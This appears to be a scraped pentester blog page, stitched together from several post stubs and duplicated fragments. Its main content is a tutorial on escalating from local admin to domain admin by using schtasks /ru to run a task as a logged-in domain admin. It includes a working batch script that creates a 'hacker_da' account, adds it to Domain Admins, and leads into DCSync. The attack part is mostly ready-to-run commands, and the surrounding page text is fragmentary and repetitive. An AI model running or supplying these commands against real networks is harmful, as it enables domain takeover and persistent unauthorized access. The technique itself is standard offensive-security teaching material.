Thank you for reading through this alcohol, nicotine, and caffeine fueled rant on portforwarding. Hope you learned something, and as always, get out there and hack something!</p>


From Local Admin to Domain admin | Schtasks ftw
2025-08-12T00:00:00+00:00
Schtasks overview:</h1>
By default any user can create scheduled tasks for themselves using Windows' built in task scheduler. This can be leveraged for continued access easily enough, but what if we were a local administrator?</p>
Local administrators can create tasks for any user the local system knows about. This can of course be any local accounts on the computer, including the built in administrator account, and even System if you use the /rl (run level) highest flag.</p>
While this is nice and can provide some fun silly ways to get system, there's another more damaging thing we can do with this.</p>
schtasks.exe has a /ru flag which stands for run user. With this flag you can specify the account for the task to run as. This can include domain users!</p>
Domain users can only execute domain actions under two very specific circumstances. The first is if the user is actively logged into the machine, giving them a valid kerberos ticket. The second is if a specific Hyper-V setting is enabled. That setting is not enabled by default.</p>
Your best option is to see if a domain account is logged into the computer actively. If they are you can run commands against the domain.</p>
Exploitation</h1>
If you happen to get local admin on a machine that a domain administrator is logged into then you can use this trick to run commands as a domain admin!</p>
First you can check which users are logged into a machine using either a netexec module, or the built in query command.</p>
query user</code></p>
This will list the accounts, if a DA is logged in you're golden!</p>
I like to use a batch script to add a new DA to the domain in order to exploit this.</p>
An example is:</p>
@Echo off 

echo %date% %time% >> C:\temp\bat_logs.txt  

echo "triggered" >> C:\temp\bat_logs.txt  

net user hacker_da password /add /domain >> C:\temp\bat_logs.txt && echo "account created" >> C:\temp\bat_logs.txt || echo "error making user" >> C:\temp\bat_logs.txt  

net group "domain admins" hacker_da /add /domain /Y >> C:\temp\bat_logs.txt  && echo "hacker added to domain admin group" >> C:\temp\bat_logs.txt || echo "error adding user to group" >> C:  \temp\bat_logs.txt  

echo "finished" >> C:\temp\bat_logs.txt
</code></pre>
Then you can add a task using the following command:</p>
schtasks /create /sc ONIDLE /i 10 /tn Privesc /tr "C:\path\to\bat\file.bat" /ru domain\user_you_want_to_run_the_bat_as /rl HIGHEST</code></p>
Once the task is added you can execute it with the following command:</p>
schtasks /run /rn Privesc</code></p>
Now you have a DA whose password you know, and you can DCSync!</p>


Welcome stranger, hope you learn something!
2025-08-11T00:00:00+00:00
whoami</h1>
name: Bu4$t_Py40 (Kevin Gunter)</p>
title: penetration tester</p>
specializations: Linux | distrobox | networking | AR/VR/XR setups | Rust | network pentesting | vishing | doing stupid shit with Android</p>
why am I here:</p>
This blog will be my ramblings online. I intend to post about networking setups, pentesting war stories, my rust projects, silly vulnerabilities I discover, hacking techniques, linux configuration, AR/VR/XR setups, plus tips and tricks.</p>
Welcome stranger, let's make the world a better place by learning one new thing at a time!</p>

Ghost In The Flame

Arch Linux & AMD NPU Power: Building Your Private AI Sandbox

How</h1>

Conclusion</h1> The sky is the limit now, the lemonade server provides both an ollama sytle API and an OpenAI api for things to interact with so integrate it with what ever you want!</p>

XReal One Pro Glasses Review

Xreal One Pro Review from a Pentester</h1>

Picking a Linux Distro

Advantages of Linux</h2>

Drawbacks</h2>

Smart Watch on your Face | Even Realities G1 Review

Smart watch on your face</h1>

Even Realities G1 Review</h2>

AR Glasses | My Thoughts on the Meta Display Glasses

Sources:</h1> https://www.meta.com/ai-glasses/meta-ray-ban-display/</a></p> https://www.evenrealities.com/g1</a></p> https://github.com/even-realities</a></p> https://global.rokid.com/blogs/news/rokid-glasses-blend-ai-ar-and-style-in-a-featherlight-frame</a></p> https://mentra.glass</a></p>

FyerBook Project Announcement

What is hacking?

Hacking with XR: The Wins, The Fails, and The In-Between

Wait XR Cyberdeck?!?!?!</h1> Yeup. sure is. kinda.</p>

Catching shells from the Internet

Catching shells from the internet!</h1>

Conclusion:</h2> Thank you for reading through this alcohol, nicotine, and caffeine fueled rant on portforwarding. Hope you learned something, and as always, get out there and hack something!</p>

From Local Admin to Domain admin | Schtasks ftw

Welcome stranger, hope you learn something!

Conclusion</h1>
The sky is the limit now, the lemonade server provides both an ollama sytle API and an OpenAI api for things to interact with so integrate it with what ever you want!</p>

Sources:</h1>
https://www.meta.com/ai-glasses/meta-ray-ban-display/</a></p>
https://www.evenrealities.com/g1</a></p>
https://github.com/even-realities</a></p>
https://global.rokid.com/blogs/news/rokid-glasses-blend-ai-ar-and-style-in-a-featherlight-frame</a></p>
https://mentra.glass</a></p>

`Conclusion:</h2> Thank you for reading through this alcohol, nicotine, and caffeine fueled rant on portforwarding. Hope you learned something, and as always, get out there and hack something!</p>`